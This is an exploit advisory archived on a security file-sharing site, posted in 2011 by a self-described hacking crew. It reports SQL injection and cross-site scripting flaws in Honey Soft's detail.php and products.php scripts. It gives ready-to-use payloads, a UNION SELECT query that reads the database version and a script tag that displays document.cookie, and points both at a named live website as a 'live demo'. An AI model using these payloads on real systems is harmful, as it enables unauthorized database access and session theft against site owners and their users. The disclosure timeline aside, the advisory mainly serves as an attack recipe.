what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Honey Soft SQL Injection / Cross Site Scripting

Honey Soft SQL Injection / Cross Site Scripting
Posted Mar 28, 2011
Authored by RoAd_KiLlEr

Honey Soft suffers from remote SQL injection and cross site scripting vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 8bd7095bc322f26524154e4782051839420bd5523ebbf0a4866dd51452b89641
Download | Favorite | View

Honey Soft SQL Injection / Cross Site Scripting

Change Mirror Download
-----------------------------------------------------------------------------------------
 Honey Soft   (detail.php?prod_detail=  & products.php?catid=)   SQL-i/XSS Multiple Vulnerabilities
-----------------------------------------------------------------------------------------
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=                                                                        +=+=+=
+=+=+=     /\  | |  | |            ________    _____    _____ __    _    __   +=+=+=
+=+=+=    /  \ | |__| |    _____  / ______/   |  _  \  | ____|\ \  / \  / /   +=+=+=
+=+=+=   / /\ \| |__| |  /_____/  | |         | |_) /  | |__   \ \/   \/ /    +=+=+=
+=+=+=  / ____ \ |  | |           | |_______  | __\ \  |  __|   \       /     +=+=+=
+=+=+= /_/    \_\|  | |           |________/  |_|  \_\ | |_______\_____/_____ +=+=+=
+=+=+=                                                 |_____________________|+=+=+=
+=+=+=                                                                        +=+=+= 
+=+=+=  X-n3t - **RoAd_KiLlEr** - The|Denny` - EaglE EyE - The_1nv1s1bl3      +=+=+=
+=+=+=                                                                        +=+=+= 
+=+=+=  0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= 
+=+=+=                                                                        +=+=+=
+=+=+=           ....::: | ALBANIAN HACKING CREW | :::....        2011        +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0                                                                      0
1                ###########################################           1
0               I'm **RoAd_KiLlEr**  member from 1337 DAY Team         1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title        Honey Soft   (detail.php?prod_detail=  & products.php?catid=)   SQL-i/XSS Multiple Vulnerabilities
[+]Author        **RoAd_KiLlEr**
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com 
[~] Home: http://1337day.com
[~] Vendor: http://www.honeysoft.net/

==========ExPl0iT3d by **RoAd_KiLlEr**==========



[+] Dork: No DOrk for Lamerz !!

==========================================





[ I ].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+



[+] Description:




All the web sites that are developed by Honeysoft use the same script.
But the script is prone to SQL inection.
Input passed via the "prod_detail" parameter to detail.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
==========================================





[P0C]:  http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection] 



[D3m0]:  http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection]


[L!v3 D3m0]: http://victorbudo.com/detail.php?prod_detail=369+union+select+1,2,3,4,@@version,6--







[ II ].  XSS-Injection Vulnerability
=+=+=+=+=+=+=+=+=+=+=+=+



[+] Description:


Input passed via the "prod_detail=" parameter to detail.php and via the "products.php?catid=" parameter to products.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
=========================================================

[P0C]:  http://127.0.0.1/path/detail.php?prod_detail=[XSS]


[Atack Pattern]: "><script>alert(document.cookie)</script>


[L!v3 D3m0]: http://victorbudo.com/detail.php?prod_detail="><script>alert(document.cookie)</script>




[+] TIME TABLE:
 
26 March 2011 - Vulnerability discovered.
26 March 2011 - Vendor Notified.
26 March 2011 - Sent to vendor all data.
27 March 2011 - Vendor replied.
27 March 2011 - Advisory released.


===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka | Sid3^effects | MaFFiTeRRoR | All  1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close